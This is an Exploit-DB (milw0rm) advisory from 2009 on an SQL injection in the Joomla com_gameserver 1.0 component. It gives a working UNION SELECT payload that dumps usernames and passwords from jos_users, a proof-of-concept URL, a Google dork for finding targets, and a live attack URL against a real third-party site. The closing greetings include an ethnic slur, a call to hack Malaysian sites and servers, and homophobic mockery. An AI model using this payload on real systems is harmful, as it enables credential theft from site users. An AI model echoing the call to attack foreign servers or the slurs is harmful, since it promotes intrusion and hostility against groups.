Joomla! Component com_gameserver 1.0 - 'id' SQL Injection

EDB-ID:

9571

Author:

v3n0m

Type:

webapps

Platform:

PHP

Published:

2009-09-01

*************************************************************************
,   .                                       |          |    o     |    
|   |,---.,---.,   .,---.,---.,---.,---.,---|,---.,---.|    .,---.|__/ 
`---'|   ||   ||   |,---||    ,---||    |   ||---'|    |    ||   ||  \ 
  |  `---'`---|`---|`---^`---'`---^`    `---'`---'`    `---'``   '`   `
  `       `---'`---'                                                   
*************************************************************************
[o] Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability

			--==[ Author ]==--
[+] Author	: v3n0m
[+] Contact	: v3n0m666[at]live[dot]com
[+] Blog	: http://0wnage.wordpress.com/
[+] Group	: YOGYACARDERLINK
[+] Site	: http://yogyacarderlink.web.id/
[+] Date	: September, 03rd 2009 [INDONESIA]
*************************************************************************
			--==[ Details ]==--
[+] Software	: Game Server Component
[+] Version 	: 1.0
[+] Vendor 	: http://www.indianpulse.in/
[+] License	: GPL
[+] Vulnerable	: SQL Injection
[+] Google Dork	: inurl:"com_gameserver"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] 999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] SQLi p0c:
[+] http://127.0.0.1/[path]/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

[-] Demo Live:
[+] http://www.jacker.ro/index.php?option=com_gameserver&view=gamepanel&id=999999/**/and/**/1=2/**/union/**/select/**/group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Special Thanks	=> str0ke & milw0rm
RedLine Crew	=> Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid
		=> Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew
YOGYACARDERLINK => lingah,leQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee
		=> yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan
		=> & para gay yogyagaylink bruakakakakakakak
Others		=> g0par Santiago,Don Tukulesto,mixbrainwasher
		=> badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS
Big Thanks	=> mywisdom [nice 0-day, you're 31337]
		=> yadoy666 [Mari kita ganyang malingsianjink]
		=> Angela Chang [kamu cantik,eksotis & mengerikan] (=^_^=)

* Fuck to Malaysia <= the truly thief asia
  be carefull your culture art & song,island get stolen and claimed by them
  letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 02:55am dreaming alone about future & my old story in my bedroom

# milw0rm.com [2009-09-01]